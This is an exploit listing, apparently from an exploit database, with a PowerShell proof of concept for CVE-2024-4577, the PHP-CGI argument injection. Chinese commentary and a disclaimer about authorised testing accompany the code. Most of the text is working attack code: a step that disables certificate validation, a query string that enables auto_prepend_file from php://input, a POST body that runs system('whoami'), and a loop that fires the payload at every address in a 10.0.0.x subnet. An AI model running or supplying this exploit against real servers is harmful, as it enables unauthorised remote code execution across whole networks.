Exploit for OS Command Injection in Php CVE-2024-4577

Name: Exploit for OS Command Injection in Php CVE-2024-4577
Rating: 5 (231 reviews)
2025-05-12 | CVSS 9.8
## https://sploitus.com/exploit?id=39A24297-B467-50B1-929D-726A66E04E5C
# CVE-2024-4577_PowerShell

**請注意：  
請確保您已被授權在目標環境中進行此類滲透測試，未經授權使用攻擊技術可能違反相關法律。  
程式僅供教育和研究目的，請在合法和道德的範圍內使用。  
如果您不了解滲透測試可能帶來的後果，建議聘請紅隊專家來進行測試。**  

## 說明
一開始先設定無視網頁憑證檢查
```powershell
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

主要攻擊 Payload
```powershell
$url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
$body = "<?php system('whoami'); die(); ?>"
```
包成 function 並用 PowerShell 內建的 Invoke-WebRequest 打出去 (可自行調整 TimeoutSec 設定)
```powershell
function Invoke-RequestForIP {
    param (
        [string]$IP,
        [string]$Protocol
    )
    $url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    $body = "<?php system('whoami'); die(); ?>"
    try {
        $response = Invoke-WebRequest -Uri $url -Method Post -Body $body -UseBasicParsing -TimeoutSec 2
        return $response.Content
    } catch {
        return $_.Exception.Message
    }
}
```

透過迴圈，掃描 10.0.0.1 ~ 10.0.0.255
```powershell
$baseIP = "10.0.0."
$start = 1
$end = 255

for ($i = $start; $i -le $end; $i++) {
    $currentIP = $baseIP + $i
    foreach ($protocol in @("http", "https")) {
        $result = Invoke-RequestForIP -IP $currentIP -Protocol $protocol
        Write-Output "IP: $currentIP, Protocol: $protocol, Result: $result"
    }
}
```

# 參考資料
<https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability>  
<https://nvd.nist.gov/vuln/detail/cve-2024-4577>